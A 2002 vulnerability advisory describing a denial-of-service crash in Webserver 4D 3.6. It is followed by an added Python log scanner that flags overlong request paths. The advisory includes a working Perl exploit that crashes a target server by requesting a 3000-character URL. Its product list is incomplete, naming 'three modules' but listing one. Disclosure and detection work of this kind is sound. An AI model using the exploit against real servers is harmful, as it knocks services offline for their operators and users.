Type: Denial of Service

Release Date: August 10, 2002

Product / Vendor: Webserver 4D by MDG Computer Services, Inc. is a complete Web server environment written entirely on top of 4th Dimension, a very powerful relational database for Macintosh and Windows NT. Running on top of a database means your server can detect whether someone is a new user, how many times a page has been accessed, and much more. Web Server 4D currently has three optional modules that are built into every copy of Web Server 4D. The three modules are:
- WS4D/eCommerce

Summary: The problem is a bounds-checking flaw in Webserver 4D 3.6.0: when you request 3000 characters, Ws4d.exe just shuts down. This vulnerability also affects Webserver 4D versions prior to 3.6.0 for Microsoft Windows 2000. If a remote attacker sends a URL request containing an overly long argument, the attacker can cause the Web server to crash. The Web server must be restarted to regain normal functionality.

Exploit: An exploit for this vulnerability exists and is available below.

==================== SNIP ====================
#!/usr/bin/perl -w
# Webserver 4D 3.6 DoS by SecurityOffice
die "Webserver 4D 3.6 DoS by SecurityOffice / Usage: $0 host \n" if $#ARGV < 0;
&get($ARGV[0]);
exit 0;

sub get {
    my $host = shift;          # target host given on the command line
    my $doc  = "A" x 3000;     # 3000-character request path that triggers the crash
    system "lynx $host/$doc";  # issue the request with lynx
    print "Done!\n\n";
}
==================== SNIP ====================

Tested: Webserver 4D 3.6 / Windows 2000 SP3

Vulnerable: Webserver 4D 3.6 / Windows 2000 SP3

Disclaimer: http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author: Tamer Sahin
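The Summary describes a crash triggered by a request path of 3000 characters. As an added example that is not part of the advisory, the following scans web access logs for requests whose path exceeds a length threshold, so that such requests can be spotted and blocked at a proxy in front of the server. It assumes a combined-format access log (Webserver 4D's own log format is not documented here) and a threshold of 2048 characters; both are assumptions, and the log lines are constructed.

```python
import re

# Combined-format access log line (assumption: Webserver 4D's own log format
# is not given in the advisory, so a common proxy/web-server format is used).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Threshold below the 3000-character request the advisory reports as fatal
# (assumption: no legitimate URL on this site comes close to this length).
MAX_PATH_LEN = 2048


def find_long_requests(lines, max_len=MAX_PATH_LEN):
    """Return one record per log line whose request path is longer than max_len."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than guess at fields
        path = m.group("path")
        if len(path) > max_len:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "path_len": len(path),
                "status": int(m.group("status")),
            })
    return hits


# Constructed sample log: one normal request, one 3000-character path, one normal.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Aug/2002:12:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [10/Aug/2002:12:00:02 +0000] "GET /' + "A" * 3000 + ' HTTP/1.0" 500 0',
    '10.0.0.5 - - [10/Aug/2002:12:00:03 +0000] "GET /products.html HTTP/1.0" 200 2210',
]

if __name__ == "__main__":
    for hit in find_long_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} "
              f"path_len={hit['path_len']} status={hit['status']}")
```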